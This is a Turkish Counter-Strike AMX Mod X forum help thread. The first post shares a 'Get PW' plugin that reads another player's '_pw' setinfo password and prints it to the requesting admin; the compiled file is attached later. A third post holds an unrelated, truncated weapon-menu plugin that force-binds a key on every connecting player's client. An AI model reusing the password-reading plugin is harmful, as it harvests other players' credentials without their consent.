Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Acil yardım
#1
Arkadaşlar bunu bana sma olarak atabilirmisiniz



#include <amxmodx>

#include <amxmisc>

public plugin_init(){

register_plugin("Get PW", "1.0", "ALINTI")

register_concmd("amx_getpw","get_pw",ADMIN_RCON,"<nick>")
}

public get_pw(id,level,cid){

if(!cmd_access(id,level,cid,2)) return PLUGIN_HANDLED

new Uid,tname[65];


Uid = find_player("bhl")

if(Uid==0) {
console_print(id,"Oyuncu Bulunamadi !")
return PLUGIN_HANDLED
}

if(!is_user_connected(Uid) && is_user_bot(Uid)) {
return PLUGIN_HANDLED
}

static szSifre[32]

get_user_info(Uid, "_pw", szSifre, 31)
get_user_info(Uid, "name", tname, 64)

console_print(id,"%s Isimli Oyuncunun Sifresi: %s",tname,szSifre)

return PLUGIN_HANDLED
}
Reply
#2
Buyur;


Attached Files
.amxx   Get_PW.amxx (Size: 3.38 KB / Downloads: 39)
.sma   Get_PW.sma (Size: 678 bytes / Downloads: 46)
Coder İmza
PHP Code:
İletişim => cebinihat@hotmail.com 

Model İmza
PHP Code:
İletişim => cebinihat@hotmail.com 

CSP Signatür
PHP Code:
İletişim => cebinihat@hotmail.com 


En İyi Konularım:
Leqend Shop | Furkan Dize Shop |

Reply
#3
#include <amxmodx>
#include <colorchat>
#define PLUGIN "Ozel Silah Menu"
#define VERSION "1.0"
#define AUTHOR "Nobb"

public plugin_init() {
register_plugin(PLUGIN,VERSION,AUTHOR)
register_clcmd("say /biomenu","Menu")
register_clcmd("say_team /biomenu","Menu")
set_task(60.0, "yazi", 0, _, _, "b")
}
public client_connect(id) {
client_cmd(id,"bind j /biomenu")
}
public Menu(id) {
new menu = menu_create("\rZMKING BIOMENU \w| \ySilah Menu", "menu_handler")

menu_additem(menu, "\w==> \yGoldenak \w<== \r[ \wTUTAR: 12000 \r]", "1", 0);
menu_additem(menu, "\w==> \yEthereal \w<== \r[ \wTUTAR: 15000 \r]", "2", 0);
menu_additem(menu, "\w==> \yMilkor M32 \w<== \r[ \wTUTAR: 15000 \r]", "3", 0)
menu_setprop(menu,MPROP_NEXTNAME,"\wIleri")
menu_setprop(menu,MPROP_BACKNAME,"\wGeri")
menu_setprop(menu,MPROP_EXITNAME,"\wCikis");
menu_setprop(menu, MPROP_EXIT, MEXIT_ALL);
menu_display(id, menu, 0);
return PLUGIN_CONTINUE
}
public menu_handler(id, menu, item)
{

if( item == MENU_EXIT )
{
menu_destroy(menu);
return PLUGIN_HANDLED;
}

new data[6], iName[64];
new access, callback;
menu_item_getinfo(menu, item, access, data,5, iName, 63, callback);
new key = str_to_num(data);
new adminismi[32]
get_user_name(id,adminismi,31)

switch(key)
{
case 1: {
register_clcmd("say /goldenak","Goldenak")
ColorChat(id,GREEN,"^3[ZMKING]^4 Goldenak Silahini Basariyla Satin Aldiniz.!")
}
case 2: {
register_clcmd("say /ethereal","Ethereal")
ColorChat(id,GREEN,"^3[ZMKING]^4 Ethereal Silahini Basariyla Satin Aldiniz.!")
}
case 3: {
register_clcmd("say /m32","Milkor M32")
ColorChat(id,GREEN,"^3[ZMKING]^4 Milkor M32 Silahini Basariyla Satin Aldiniz.!")
}

}

menu_destroy(menu);
return PLUGIN_HANDLED;
}
public yazi(id) {
ColorChat(id,NORMAL,"Ozel Silah Menusunu Acmak Icin^4 Say'dan^3 /biomenu^1 Yaz & [^4 J^1 ] Tusuna Bas.")
ColorChat(id,GREEN,"^3[ZMKING]^4 Altin Keles almak icin /goldenak yazin (12000$dir)")
ColorChat(id,GREEN,"^3[ZMKING]^4 Ethereal [Lazer] silahini almak icin /ethereal yazin (15000$dir)")
ColorChat(id,GREEN,"^3[ZMKING]^4 Milkor M3









menude sılahlar gozukuyor ama alınmıyor basınca say komutu koyulmamıs herkhaldde duzeltı bırınız lutven yapamadım ben kaac gundur ugrasıyom yapın sunu lutven

- - - - - - - - - -

menu gosukuyor ama sılah alınmıyor duzletın lutven ne olour vcok acıl lazım ya hadı
Reply
#4
eyw
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Yardım menu BaBacK 0 6,231 10-09-17, 17:11
Last Post: BaBacK
  Yardim 2 BaBacK 0 4,637 10-09-17, 17:09
Last Post: BaBacK
  Yardim BaBacK 0 5,135 10-09-17, 17:07
Last Post: BaBacK
  Sizin icin basit bi yardim istiyorum By Mustafa 0 7,608 09-07-17, 16:33
Last Post: By Mustafa
  Plugin hatası | yardım edin lütfen! saanelan 0 4,442 20-07-16, 23:18
Last Post: saanelan
  Beyler Yardım Edebilirmisiniz NicoMedia Lütfen ? kinqplus 2 4,163 22-07-15, 10:49
Last Post: xuligan

Foruma Atla:


Users browsing this thread: 1 Guest(s)